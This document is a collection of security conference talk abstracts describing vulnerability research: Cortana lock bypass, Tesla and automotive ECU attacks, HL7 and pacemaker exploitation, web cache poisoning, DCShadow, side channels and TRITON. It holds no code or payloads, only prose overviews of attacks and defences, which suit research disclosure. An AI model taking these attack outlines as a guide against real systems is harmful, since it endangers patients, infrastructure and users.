Allowing interaction with a locked machine is a dangerous architectural decision, and earlier this year, we exposed the Voice of Esau (VoE) exploit for a Cortana vulnerability. The VoE exploit allowed attackers to take over a locked Windows10 machine by combining voice commands and network fiddling to deliver a malicious payload to the victim machine.
In this presentation, we will reveal the "Open Sesame" vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the "Open Sesame" vulnerability attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code focused defenses such as Antivirus, Anti-malware and IPS blind to the attack.
We would conclude by suggesting some defense mechanisms and compensating controls to detect and defend against such attacks.
The term "smart city" evokes imagery of flying cars, shop windows that double as informational touchscreens, and other retro-futuristic fantasies of what the future may hold. Stepping away from the smart city fantasy, the reality is actually much more mundane. Many of these technologies have already quietly been deployed in cities across the world. In this talk, we examine the security of a cross-section of smart city devices currently in use today to reveal how deeply flawed they are and how the implications of these vulnerabilities could have serious consequences.
In addition to discussing newly discovered pre-auth attacks against multiple smart city devices from different categories of smart city technology, this presentation will discuss methods for how to figure out what smart city tech a given city is using, the privacy implications of smart cities, the implications of successful attacks on smart city tech, and what the future of smart city tech may hold.
We, Keen Security Lab of Tencent, have successfully implemented two remote attacks on the Tesla Model S/X in year 2016 and 2017. Last year, at Black Hat USA, we presented the details of our first attack chain. At that time, we showed a demonstration video of our second attack chain, but without technical aspects. This year, we are willing to share our full, in-depth details on this research.
In this presentation, we will explain the inner workings of this technology and showcase the new capability that was developed in the Tesla hacking 2017. Multiple 0-days of different in-vehicle components are included in the new attack chain.
We will also present an in-depth analysis of the critical components in the Tesla car, including the Gateway, BCM(Body Control Modules), and the Autopilot ECUs. For instance, we utilized a code-signing bypass vulnerability to compromise the Gateway ECU; we also reversed and then customized the BCM to play the Model X "Holiday Show" Easter Egg for entertainment.
Finally, we will talk about a remote attack we carried out to successfully gain an unauthorized user access to the Autopilot ECU on the Tesla car by exploiting one more fascinating vulnerability. To the best of our knowledge, this presentation will be the first to demonstrate hacking into an Autopilot module.
Healthcare infosec is in critical condition- too few bodies, underfunded to a fault, and limping along on legacy systems stuffed with vulnerabilities. From exploited insulin/medication pumps to broken pacemakers, no implantable or medical device is safe. But there's an even bigger risk on the horizon.
WannaCry was a wake-up- when you knock out systems that enable a hospital to care for patients, you start knocking out patients. Hospitals are no longer secure by virtue of being obscure- connected infrastructure means vulnerable infrastructure.
The HL7 standards comprises the backbone of clinical data transfer used in every hospital around the globe. Frequently implemented as plain text messages sent across flat networks with no authentication or verification, HL7 is both critically ubiquitous and massively unsecured- and thus every lab sample, every medical image, every doctor's order becomes a potential time bomb.
Join Quaddi and r3plicant, hackers who moonlight as physicians, and Maxwell Bland as they explore the myriad of ways in which HL7 attacks can be used to subvert the implicit trust doctors place in this infrastructure- and just how catastrophic that broken trust can be. Come for the sobering premise, stay for the live HL7 attack demo- but be warned: there will be blood.
TLS 1.3 is the new secure communication protocol that should be already with us. One of its new features is 0-RTT (Zero Round Trip Time Resumption) that could potentially allow replay attacks. This is a known issue acknowledged by the TLS 1.3 specification, as the protocol does not provide replay protections for 0-RTT data, but proposed countermeasures that would need to be implemented on other layers, not at the protocol level. Therefore, the applications deployed with TLS 1.3 support could end up exposed to replay attacks depending on the implementation of those protections.
This talk will describe the technical details regarding the TLS 1.3 0-RTT feature and its associated risks. It will include Proof of Concepts (PoC) showing real-world replay attacks against TLS 1.3 libraries and browsers. Finally, potential solutions or mitigation controls would be discussed that will help to prevent those attacks when deploying software using a library with TLS 1.3 support.
Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.
I'll illustrate and develop this technique with vulnerabilities that handed me control over numerous well known websites and frameworks, progressing from simple single-request attacks to intricate exploit chains that hijack JavaScript, pivot across cache layers, subvert social media and misdirect cloud services in pursuit of the perfect exploit.
Unlike previous cache poisoning techniques, this approach doesn't rely on other vulnerabilities like response splitting, or cache-server quirks that are easily patched away. Instead, it exploits core principles of caching, and as such affects caching solutions indiscriminately. The repercussions also extend beyond websites - I'll show how using this approach, I was able to compromise Mozilla infrastructure and partially hijack a notorious Firefox feature, letting me conduct tens of millions of Firefox browsers as my personal low-fat botnet.
In addition to sharing a thorough detection methodology, I'll also release and open source the Burp Suite Community extension that fueled this research. You'll leave with an altered perspective on web exploitation, and an appreciation that the simple act of placing a cache in front of a website can take it from completely secure to critically vulnerable.
Humans are susceptible to social engineering. Machines are susceptible to tampering. Machine learning is vulnerable to adversarial attacks. Researchers have been able to successfully attack deep learning models used to classify malware to completely change their predictions by only accessing the output label of the model for the input samples fed by the attacker. Moreover, we've also seen attackers attempting to poison our training data for ML models by sending fake telemetry and trying to fool the classifier into believing that a given set of malware samples are actually benign. How do we detect and protect against such attacks? Is there a way we can make our models more robust to future attacks?
We'll discuss several strategies to make machine learning models more tamper resilient. We'll compare the difficulty of tampering with cloud-based models and client-based models. We'll discuss research that shows how singular models are susceptible to tampering, and some techniques, like stacked ensemble models, can be used to make them more resilient. We also talk about the importance of diversity in base ML models and technical details on how they can be optimized to handle different threat scenarios. Lastly, we'll describe suspected tampering activity we've witnessed using protection telemetry from over half a billion computers, and whether our mitigations worked.
Recent advancements have reinvented deception technologies and their use as a security layer of defense, making them no longer passé but so effective and believable that they are fast-becoming widespread in mature organizations. Many security providers now successfully disrupt attacks by offering comprehensive deception capabilities, featuring a variety of traps, deceits, and lures distributed across the enterprise's internal environment. While deception is a legitimate (and cool) threat detection and response strategy, like any other security trend, adversaries will inevitably adapt.
In this talk, we will discuss key weaknesses in deception technologies enabling a persistent attacker to overcome modern advanced deception techniques and beat deception solutions at their own game. We will share some guidelines, tactics, and a new open-source tool to arm red teams with the knowledge needed to avoid getting trapped during their next engagement.
Volume Shadow Copy Service (VSS) is a backup feature for recent Windows OSes. You can create storage snapshots by using VSS. If users refer to snapshots, they can recover its contents. VSS is one of the most important things to restore deleted files such as files created by attackers (e.g. attack tools) in the computer forensic task.
However, in recent years, ransomware deletes the snapshots before encrypting files. When the snapshots are deleted, there is no way to access them officially. But, if we can recover the deleted snapshots, we can recover the files which were managed by the snapshots and which must have been lost.
Roughly speaking, VSS manages two kinds of data. One is called "Catalog" and another is called "Store." These files are located in the "System Volume Information" folder. The meta information of VSS snapshots are stored in catalog file, such as creation date and time, offsets to Store data, and so on. The differential data between the current NTFS volume and the snapshot is stored in store files. Store files are created every snapshots creation.
If snapshots are deleted, catalog and store files are deleted. Furthermore, the content of catalog file is destroyed. On the other hand, store data is almost intact. It means that we can access deleted snapshots if we could carve store files and reconstruct the catalog file from recovered store files.
Although Windows can't access deleted snapshots data, our new tools named vss_carver and extended vshadowmount command are able to handle this.
We will cover the details of the implementation and we will also give you several demonstrations with the new tools.
In recent years, we have been witnessing a steady increase in security vulnerabilities in firmware. Nearly all of these issues require local (often privileged) or physical access to exploit. In this talk, we will present novel *remote* attacks on system firmware.
In this talk, we will show different remote attack vectors into system firmware, including networking, updates over the Internet, and error reporting. We will also be demonstrating and remotely exploiting vulnerabilities in different UEFI firmware implementations which can lead to installing persistent implants remotely at scale. The proof-of-concept exploit is less than 800 bytes.
How can we defend against such firmware attacks? We will analyze the remotely exploitable UEFI and BMC attack surface of modern systems, explain specific mitigations for the discussed vulnerabilities, and provide recommendations to detect such attacks and discover compromised systems.
With a 19 year old vulnerability, we were able to sign a message with the private key of Facebook. We'll show how we found one of the oldest TLS vulnerabilities in products of 10 different vendors and how we practically exploited it on famous sites. We'll also discuss how the countermeasures introduced back in TLS 1.0 and expanded over the years failed to prevent this and why RSA PKCS #1 v1.5 encryption should be deprecated. Finally, we'll present what related problems are still present and unfixed in many popular TLS libraries.
Toshiba FlashAir are wireless SD cards used by photographers and IoT enthusiasts. They integrate both a Japanese SoC and a Japanese Operating System. None of those have been discussed in security conferences, nor were clearly identified before this project. The SoC is employed in embedded devices as well as in the automotive industry. The ISA looks like MIPS with funny instructions such as a loops! The OS implements a RTOS specification that is believed to represent 60% of the embedded OS currently deployed, according to a survey by its designers.
This talk will present investigations that lead to the discovery of the architecture and the operating system from nearly zero knowledge of the card. These investigations were performed with open-source tools only: miasm2 is used as the assembly, disassembly and emulation backend, while radare2 is used as the interface to reverse the firmware. Specific tools were developed during this project and will be released after the talk.
The methodology used and the steps that lead to code execution on the card will be laid out in detail. Some involved reading assembly while other ones were achieved by accessing online documentation in English and Japanese. The main goal is to share lessons learned as well as mistakes made during the project.
Finally, a complete demonstration of code execution will be given.
The drive for ever smaller and cheaper components in microelectronics has popularized so-called "mixed-signal circuits," in which analog and digital circuitry are residing on the same silicon die. A typical example is WiFi chips which include a microcontroller (digital logic) where crypto and protocols are implemented together with the radio transceiver (analog logic). The special challenge of such designs is to separate the "noisy" digital circuits from the sensitive analog side of the system.
In this talk, we show that although isolation of digital and analog components is sufficient for those chips to work, it's often insufficient for them to be used securely. This leads to novel side-channel attacks that can break cryptography implemented in mixed-design chips over potentially large distances. This is crucial as the encryption of wireless communications is essential to widely used wireless technologies, such as WiFi or Bluetooth, in which mixed-design circuits are prevalent on consumer devices.
The key observation is that in mixed-design radio chips the processor's activity leaks into the analog portion of the chip, where it is amplified, up-converted and broadcast as part of the regular radio output. While this is similar to electromagnetic (EM) side-channel attacks which can be mounted only in close proximity (millimeters, and in a few cases a few meters), we show that it is possible to recover the original leaked signal over large distances on the radio. As a result, variations of known side-channel analysis techniques can be applied, effectively allowing us to retrieve the encryption key by just listening on the air with a software defined radio (SDR).
Over the last fifteen years, many large software development organizations have adopted Security Development Lifecycle (SDL) processes as effective approaches to delivering secure software. Motivation for SDL comes from the realization that software vulnerabilities can have real impacts – on information security, on organizations' reputations, on customer satisfaction, and on revenues. But what if you don't have 40,000 developers and run a small to medium dev shop?
Fortunately, SDL adoption need not be "only for the rich." While large organizations have the resources to create large teams and customized tools, smaller organizations have the advantage that they can focus an SDL on the specific products, tools, and threats that are relevant to the software they produce. They can also benefit from a wide array of free and affordable resources that can help them address many of the challenges posed by creating and sustaining an SDL program. With management commitment to SDL fundamentals and an investment of resources proportional to the size of the development organization and its products, it's possible for small organizations to build an SDL program and deliver software that customers will find secure.
This briefing will describe some resources that can help smaller organizations create an effective SDL program. It will also outline some secure development concerns that may be especially important to those organizations – such as dependence on software they didn't write – and ways that they can address those concerns.
SirenJack is a vulnerability that was found to affect radio-controlled emergency warning siren systems from ATI Systems. It allows a bad actor, with a $30 handheld radio and a laptop, to set off all sirens in a deployment. Hackers can trigger false alarms at will because the custom digital radio protocol does not implement encryption in vulnerable deployments.
Emergency warning siren systems are public safety tools used to alert the population of incidents, such as weather and man-made threats. They are widely deployed in cities, industrial sites, military installations, and educational institutions across the US and abroad.
Sirens are often activated via a radio frequency (RF) communications system to provide coverage over a large area. Does the security of these RF-based systems match their status as critical infrastructure? The 2017 Dallas siren hack showed that many older siren systems are susceptible to replay attacks, but what about more modern ones?
I studied San Francisco's Outdoor Public Warning System, an ATI deployment, for two years to learn how it was controlled. After piecing together clues on siren poles, and searching the entire radio spectrum for one unknown signal, I found the system's frequency and began passive analysis of the protocol. Monitoring the weekly siren tests, I made sense of patterns in the raw binary data and found the system was insecure and vulnerable to attack.
This presentation will take you on the journey of the research, and detail the tools and techniques used, including leveraging Software Defined Radio and open source software to collect and analyse massive sets of RF data, and analyse a custom digital protocol. It will also cover the Responsible Disclosure process with the vendor, their response, and subsequent change to the protocol. A proof-of-concept will be shown for good measure.
To keep up with the growing demand of always-on and available-anywhere connectivity, the use of cellular, in comparison to its wireless mobile connectivity counterpart in the electromagnetic spectrum, is rapidly expanding. My research in the IoT space led me down the path of discovering a variety of vulnerabilities related to cellular devices manufactured by Sierra Wireless and many others. Proper disclosures have occurred; however, many manufactures have been slow to respond. This led into examining numerous publicly disclosed vulnerabilities that were considered "low-hanging-fruit" against cellular devices and other cellular-based network modems that are often deployed as out of band management interfaces. The research expanded through the details provided in configuration templates available by each device including the following:
- Wireless Network Information
- IPSec Tunnel Authentication Details
- Connected devices and services
Focusing on an obfuscated series of examples to protect the organizations, people, and companies identified; this presentation focuses on the services and systems information of the following, commonly deployed cellular-connected devices to provide an in-depth look at what is easily possible:
- Emergency Response systems
- Resource collection systems
- Transportation Safety
- Out of band management
"They told me I could be anything I wanted, so I became a Domain Controller."
While SAMBA did implement Active Directory replication protocol for years, it was not easy to abuse it, especially on the Windows OS. The lsadump::DCSync feature in mimikatz was a first breakout in this area. Red teamers could extract secrets needed for kerberos tokens abuse and even impersonate domain controllers. In short, a read access to the AD database.
Let's be granted write access! It's time to invoke the full power of a domain controller with the new lsadump::DCShadow attack implemented in mimikatz and introduced at BlueHat IL 2018 by the mimikatz and PingCastle authors.
The immediate benefit of DCShadow is to bypass SIEMs, looking at logs collected from all DC, except this specific one. But what if the replication data doesn't follow the specification ? Can we do more ?
Let's be creative and push partial changes or changes forbidden by the specification: can we create some backdoors with Golden ticket ? Reaching unprotected trust via NTLM? targeting admins via monitoring reports? Is object class inmutable? Can we play god by creating and killing objects at will ? More ?
That's not the end: by owing replication data and internal attributes, forensic analysts will now have a hard time doing their job.
Is DCShadow a game changer like DCSync was at its time?
Almost all security research has a question often left unanswered: what would be the financial consequence, if a discovered vulnerability is maliciously exploited? The security community almost never knows, unless a real attack takes place and the damage becomes known to the public. Development of the cryptocurrencies made it even more difficult to control the impact of an attack since all the security relies on a single wallet's private key which needs to stay secure. Multiple breaches of private wallets and public currency exchange services are well-known, and to address the issue a few companies have come up with secure hardware storage devices to preserve the wallet's secrets at all costs.
But, how secure are they? In this research, we show how software attacks can be used to break in the most protected part of the hardware wallet, the Secure Element, and how it can be exploited by an attacker. The number of identified vulnerabilities in the hardware wallet show how software vulnerabilities in the TEE operating system can lead to a compromise of the memory isolation and a reveal of secrets of the OS and other user applications. Finally, based on the identified vulnerabilities an attack is proposed which allows anyone with only physical access to the hardware wallet to retrieve secret keys and data from the device. Additionally, a supply chain attack on a device allowing an attacker to bypass security features of the device and have full control of the installed wallets on the device.
The Go implementation of the P-256 elliptic curve had a small bug due to a misplaced carry bit affecting less than 0.00000003% of field subtraction operations. We show how to build a full practical key recovery attack on top of it, capable of targeting JSON Web Encryption.
Go issue #20040 affected the optimized x86_64 assembly implementation of scalar multiplication on the NIST P-256 elliptic curve in the standard library.
p256SubInternal computes x - y mod p. In order to be constant time it has to do both the math for x >= y and for x < y, it then chooses the result based on the carry bit of x - y. The old code chose wrong (CMOVQNE vs CMOVQEQ), but most of the times compensated by adding a carry bit that didn't belong in there (ADCQ vs ANDQ). Except when it didn't, once in a billion times (when x - y < 2^256 - p). The whole patch is 5 lines.
The bug was found by a Cloudflare engineer because it caused ECDSA verifications to fail erroneously but the security impact was initially unclear. We devised an adaptive bug attack that can recover a scalar input to ScalarMult by submitting attacker-controlled points and checking if the result is correct, which is possible in ECDH-ES.
We reported this to the Go team, Go 1.7.6 and 1.8.2 were issued and the vulnerability was assigned CVE-2017-8932.
At a high level, this P-256 ScalarMult implementation processes the scalar in blocks of 5 bits. We can precompute points that trigger the bug for each specific 5 bit value, and submit them. When the protocol fails, we learned 5 key bits, and we move on to the next 5, Hollywood style. In about 500 submissions on average we recover the whole key.
In this talk, we will unveil the new in-house capabilities of a nation state actor who has been observed deploying both Android and iOS surveillance tooling, known as Stealth Mango and Tangelo. The actor behind these offensive capabilities has successfully compromised the devices of government officials and military personnel in numerous countries with some directly impacting Western interests. Our research indicates this capability has been created by freelance developers who primarily release commodity spouse-ware but moonlight by selling their own custom surveillanceware to state actors. One such state actor has been observed deploying Stealth Mango and this presentation will unveil the depth and breadth of their campaigns, detailing not only how we watched them grow and develop, test, QA, and deploy their offensive tooling, but also how operation security mistakes ultimately led to their attribution.
Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes with tight release timelines or no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public or vulnerabilities found within internally written code can challenge the best intentions of any SDLC.
How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it's already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?
As a software developer, product owner, or business leader being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security fix pressure and expectations of immediate security fixes on tight timelines are becoming the norm.
This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they've spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software 'security gate.' Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.
• Tips on how to document, prioritize, tag, and track security vulnerabilities, their fixes, and how to prioritize them into release targets
• Features of common tools [JIRA, Bugzilla, and Excel] you may not know of and examples of simple automation you can use to verify ticket resolution.
• A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.
Hacking is a high-risk, high-reward, with a high-cost to human capital. In this session, we will talk about the effects of human factors in cyber operations and why you should care about them. Specifically, we will focus on results of research at the National Security Agency that studied the effects of cognitive stress on tactical cyber operators. A key motivation for this work was the intuition that cognitive stress may negatively affect operational security, work performance, and employee satisfaction. Operator fatigue, frustration, and cognitive workload increases significantly over the course of a tactical cyber operation. Fatigue and frustration are correlated, and as one increases so does the other. The longer the operation, the greater the mental demand, physical demand, time pressure, frustration, and overall effort needed to complete the operation. Operations longer than 5 hours have 10% greater increases in fatigue and frustration compared to shorter operations. We found no link of performance to operation length; that is, from the operator's perspective longer operations did not result in higher success. Knowing how these factors affect cyber operations has helped us make more informed decisions about mission policy and workforce health. We hope that by sharing this with the greater Black Hat community, they will also be able to learn from our study and improve their own cybersecurity operations.
While security products are a great supplement to the defensive posture of an enterprise, to well-funded nation-state actors, they are an impediment to achieving their objectives. As pentesters argue the efficacy of a product because it doesn't detect their specific offensive technique, mature actors recognize a need to holistically subvert the product at every step during the course their operation.
Sysmon - a security tool used widely by defenders as well as several security vendors makes it a great target in which to demonstrate a formalized approach to evasion and tampering. This talk will cover host footprint analysis, evasion, tampering, and rule auditing/bypass strategies. Specific strategies covered will include attack surface analysis, determining evasion "paths of least resistance", and identification of narrow, "exploitable" detections. By the end of the talk, it will become evident that the strategies applied to Sysmon can be easily applied to any security product.
Are security product vendors preparing themselves to be resilient against threats specifically targeting their product? Should they be? It is inevitable that capabilities will be developed against security products. Armed with that knowledge, how should vendors respond? You be the judge by applying a more systematic methodology to assessing security products.
The term 'air-gap' in cyber security refers to a situation in which a sensitive computer, classified network, or critical infrastructure is intentionally physically isolated from public networks such as the Internet. Air-gap isolation is mainly used to maintain trade secrets, protect confidential documents, and prevent personal information from being leaked out, accidently or intentionally.
In this talk, we focus on 'Bridgeware', a type of malware which allows attackers to overcome ('bridge') air-gap isolation in order to leak data. We talk about various covert channels proposed over the years, including electromagnetic, magnetic, acoustic, thermal, electrical and optical methods (and introduce new air-jumping technique from our recent research). We examine their characteristics and limitations, including bandwidth and effective distance. We also discuss the relevance of these threats and the likelihood of related cyber-attacks in the modern IT environment. Finally, we present different types of countermeasures to cope with this type of threat. We will include demo videos.
Software-Defined Networking (SDN) is getting attention for the next-generation networking today. The key concept of SDN is to decouple the control logic from the traditional network devices so that network developers can design innovative network functions in a more flexible and programmable way. However, SDN is not always bringing advantages to us. Security experts have constantly raised security concerns about SDN, and some vulnerabilities have been uncovered in the real world. If SDN is not secure, how can we measure the security level of SDN environments?
In this talk, we introduce a powerful penetration testing tool for SDN called DELTA, which is officially supported by Open Networking Foundation (ONF). First, DELTA can automate diverse published attack scenarios against various SDN components from testing to evaluating. Also, to discover unknown vulnerabilities that may exist in SDN, DELTA leverages a blackbox fuzzing technique that randomizes different control flows in SDN. It enables us to systemically reveal unknown security issues rather than the empirical and ad-hoc methods that most previous studies use. By using DELTA, anyone can easily and thoroughly test not only popular open source SDN controllers (i.e., ONOS, OpenDaylight, Floodlight, and Ryu), but also SDN-enabled switches (i.e., OpenvSwitch, HP, and Pica8) in the real world.
We will show nine new attack cases that have been found by DELTA but never been announced before.
Also, we will discuss:
- What control flows are in SDN, and why those are important as a key feature compared to the traditional networks.
- What key components and workflow of DELTA to attack the real SDN components.
- Which nine new attack cases have been discovered by DELTA, and we will demonstrate it. For example, one of the new attacks violates the table condition, leading to the black hole of handling packets in the switch.
WebAssembly is a new standard that allows assembly-like code to run in browsers at near-native speed. But how does WebAssembly work, and how does it execute code while maintaining the security guarantees of a browser? This presentation gives an overview of the features of WebAssembly, as well as examples of vulnerabilities that occur in each feature. It will also discuss the future of WebAssembly, and emerging areas of security concern. Learn to find bugs in one of the newest and fastest growing parts of the browser!
The wisdom on why it is difficult to recruit and retain women in the industry has changed over the past decade; the speaker will share the latest information about the most successful approaches and results from a recent working group on acquiring and retaining female technology leaders. The speaker will also discuss how the methodologies used in studies affect the trustworthiness of the conclusions and how to get insight into your workforce using readily-available tools. Participants will leave with a core understanding of why the gender gap in cyber security exists, how to collect information from systems and people in your organization to gain valuable insights, and how a scorecard methodology created by diverse cyber security engineers working in the industry can help identify areas for improvement.
Welcome to a data center! A place where the air conditioner never stops and the long line of tiny, red and blue LEDs dance chaotically over the sounds of the never-ending fans, playing in unison.
One thing is certain, everyone avoids data centers like the plague. And, like one of the greatest leaders of our time once said: "Behind every need, there is a right" (or in this case, a product).
Welcome to the world of Out of Band Power Management devices, where vendors decide to put an extra microprocessor inside the motherboard to allow you to remotely monitor heat, fans, and power.
We decided to take a look at these devices and what we found was even worse than what we could have imagined. Vulnerabilities that bring back memories from the 1990s, remote code execution that is 100% reliable and the possibility of moving bidirectionally between the server and the BMC, making not only an amazing lateral movement angle, but the perfect backdoor too.
All Windows researchers know about RPC and ALPC, and the attack surface provided through the kernel's system call layer. As they know about shared memory, the object manager, the registry, and countless other more 'creative' kernel mechanisms which allow cross-process data sharing and communication, such as raw ETW or atom tables.
But since Windows 8, the kernel has implemented a new facility, accessible from all application layers, which has grown in complexity and use to cover major Windows technologies, without anyone going into its implementation details: the Windows Notification Facility (WNF).
Originally intended to support "Toast" notifications and Windows Push Notifications, WNF has grown today into a generalized framework for internal system communication, coordination, synchronization, and notification of various user and system events, across the kernel/user boundary (and between user applications). Launching a process causes a WNF notification. Making a phone call causes a notification. Your GPS location changing causes a notification. Lack of input for N minutes causes a notification. Installing a start menu tile causes a notification. Such examples only scratch the surface -- there are over a thousand different notification IDs which dozens of 'publishers' will issue, to be consumed by countless 'consumers', including multiple kernel drivers.
WNF isn't only an incredible way to gather information on the user and application's behaviors on the system. WNF registrations can be made to 'persist' across system reboots, and interesting persistence can be achieved through this obscure mechanism, especially given the User/Kernel boundary crossing. And each WNF registration is fully securable by the standard Windows security descriptor model -- and like standard securable entities, not all descriptors are configured in their most optimal way.
Notifications, by the way, are not merely 'signaled events' indicating something has happened. Each notification can contain a payload of up to 4KB of data, and consumers will often parse that data (sometimes incorrectly/too-trustingly) as part of receiving the signal. This means that outside of a useful way of snooping/faking behaviors by messing with what consumers 'trust' from their producers, payload data itself can be manipulated/fuzzed to cause parsing bugs (including in kernel consumers). Furthermore, once posted, payload data persists, such that a malicious reader could obtain interesting data from someone else's notification (including sometimes, uninitialized buffers containing pointers and other private heap data). Such payload data can even persist across reboots for permanent WNF notifications.
On top of all of these interesting uses cases, all of Windows' 'hidden' features that are A/B tested in preview builds (aka the 'velocity flags') are also implemented behind WNF. A 4KB WNF blob is used to encode which A/B testable velocity flags are enabled for a particular install, and playing with WNF can unlock new Windows behaviors (or disable them) months ahead of official release.
WNF is *not* merely a layer built upon ETW, or ALPC, or any other kernel mechanism you're likely to be familiar with -- it's a completely internal mechanism not exposed through the object manager or any other existing API, available only through a set of undocumented NT system calls (and even more undocumented Kernel32/NTDLL library wrappers). Your Next Gen EDR tools, ETW Sysmon logging tools, super Windows Defender All The Guard ATP Edition tools, and forensic debugger tools have no visibility into it, and attackers might be using it behind your back. As part of this talk, three initial WNF exploitation, fuzzing, and forensic tools will be released to tip the scales for the blue team, after 6 years of kernel obscurity.
Automotive security is a hot topic, and hacking cars is cool. These vehicles are suffering the growing pains seen in many embedded systems: security is a work-in-progress, and in the meantime we see some fun and impressive hacks. Perhaps the most well-known examples are the Jeep and Tesla hacks. But, we know that the industry is paying attention. Consider a bright future where secure boot methods have been universally implemented, without obvious bugs; adversaries no longer have access to unencrypted firmware, ECUs refuse to run any unsigned code, and we feel safe again. Will automotive exploitation be "mission impossible", or do hackers still have a few tricks up their sleeve?
We will demonstrate how hardware attacks like Fault Injection can be used to obtain the firmware from secure ECUs for which software vulnerabilities are absent. Once we have the firmware, we will discuss successful approaches for efficient analysis of automotive firmware. To provide a concrete example, we will demonstrate the custom emulator we wrote for one of our targets (an instrument cluster) and show that it can accurately perform dynamic analysis. Our emulator allows us to quickly understand the firmware's functionality, extract secrets of attacker's interest and apply fuzzing to the target's interfaces. Finally, we explain the real-world impact of these issues, how they lead to scalable attacks, and what can be done to defend today's cars.
Attacks always get better, and that means your threat modeling needs to evolve. This talk looks at what's new and important in threat modeling, organizes it into a simple conceptual framework, and makes it actionable. This includes new properties of systems being attacked, new attack techniques (like biometrics confused by LEDs) and a growing importance of threats to and/or through social media platforms and features. Take home ways to ensure your security engineering and threat modeling practices are up-to-date.
We present TLBleed, a novel side-channel attack that leaks information out of Translation Lookaside Buffers (TLBs). TLBleed shows a reliable side channel without relying on the CPU data or instruction caches. This therefore bypasses several proposed CPU cache side-channel protections, such as page coloring, CAT, and TSX. Our TLBleed exploit successfully leaks a 256-bit EdDSA key from cryptographic signing code, which would be safe from cache attacks with cache isolation turned on, but would no longer be safe with TLBleed. We achieve a 98% success rate after just a single observation of signing operation on a co-resident hyperthread and just 17 seconds of analysis time. Further, we show how another exploit based on TLBleed can leak bits from a side-channel resistant RSA implementation. We use novel machine learning techniques to achieve this level of performance. These techniques will likely improve the quality of future side-channel attacks. This talk contains details about the architecture and complex behavior of modern, multilevel TLB's on several modern Intel microarchitectures that is undocumented, and will be publically presented for the first time.
In 2017, a sophisticated threat actor deployed the TRITON attack framework engineered to manipulate industrial safety systems at a critical infrastructure facility. This talk offers new insights into TRITON attack framework which became an unprecedented milestone in the history of cyber-warfare as it is the first publicly observed malware that specifically targets protection functions meant to safeguard human lives. While the attack was discovered before its ultimate goal was achieved, that is, disruption of the physical process, TRITON is a wakeup call regarding the need to urgently improve ICS cybersecurity.
This analysis and presentation will cover:
- How the threat actors could have obtained the targeted equipment, firmware and documentation, based on our own experience,
- The level of resources (time, money, expertise) required to develop a sophisticated embedded implant like TRITON,
- The advanced methods used by the malware for a multi-stage injection of the backdoor into the controller of the Schneider Electric Triconex safety shutdown system, derived from both static and dynamic analysis of the code,
- A demo of how the TRITON malware executes on a running Triconex controller,
- Why did the attacker possibly failed to inject payload.
We will conclude with an appeal to vendors about the urgent need for equipment auditing and forensic tools. These tools must be developed before TRITON-like attacks become mass-scale and the time to start working on them is now; hacking is a fashion industry, as soon as a new exploitation technique becomes available, everybody jumps on the bandwagon.
This session will thus provide comprehensive insights into how one of the most sophisticated attacks on an ICS system to date was developed and how it could be detected during and post exploitation. This is important information for anyone seeking to secure critical infrastructure.
Why do people choose to use (or not use) Two Factor Authentication (2FA)? We report on some surprising results from a two-phase study on the Yubico Security Key working with Yubico. Despite the Yubico Security Key being among the best in class for usability among hardware tokens, participants in a think-aloud protocol encountered surprising difficulties, with none in the first round able to complete enrollment without guidance. For example, a website demo, built to make adoption simple, instead resulted in profound confusion when participants fell into an infinite loop of inadvertently only playacting the installation. We report on this and other findings of a two phase experiment that analyzed acceptability and usability of the Yubico Security Key, a 2FA hardware token implementing Fast Identity Online (FIDO). We made recommendations, and then tested the new interaction. A repeat of the experiment showed that these recommendations enhanced ease of use but not necessarily acceptability. The second stage identified the remaining primary reasons for rejecting 2FA: fear of losing the device, illusions of personal immunity to risk on the internet, and confidence in personal risk perceptions. Being locked out of an account was something every participant had suffered while losing control of their account was a distant, remote, and heavily discounted risk. The presentation will surprise and inform the practitioners, showing them that usability is not just common sense, in fact, sometimes you need to think sideways to align yourself with your potential users.
There has been significant attention recently surrounding the risks associated with cyber vulnerabilities in critical medical devices. Understandably, people are concerned that an attacker may exploit a vulnerability to modify the delivery of patient therapy, such as altering the dosage of medicine, delivering insulin therapy, or administering a shock via a pacemaker. These concerns raise several questions, such as: How do these devices work? What does the typical attack surface for implanted medical device look like? What do exploits against these systems look like? How do manufacturers respond to potentially life-threatening security issues? This presentation will address all these questions.
This presentation is the culmination of an 18-month independent case study in implanted medical devices. The presenters will provide detailed technical findings on remote exploitation of a pacemaker systems, pacemaker infrastructure, and a neurostimulator system. Exploitation of these vulnerabilities allow for the disruption of therapy as well as the ability to execute shocks to a patient.
The researchers followed coordinated disclosure policies in an attempt to help mitigate the security concerns. What followed was an 18-month roller coaster of unresponsiveness, technical inefficiencies and misleading reactions. The researchers will walk the audience through the details of disclosure and discuss the responses from the manufacturer and coordination associated with DHS ICS-CERT and the FDA. How did the manufacturer initially respond? What tactics did the manufacturer use to attempt to dismiss the independent researchers? Was the response by the manufacturer adequate from a patient responsibility standpoint? Has the actual technical vulnerability even been addressed?
Malware authors implement many different techniques to frustrate analysis and make reverse engineering malware more difficult. Many of these anti-analysis and anti-reverse engineering techniques attempt to send a reverse engineer down an incorrect investigation path or require them to invest large amounts of time reversing simple code. This talk analyzes one of the most robust anti-analysis native libraries we've seen in the Android ecosystem.
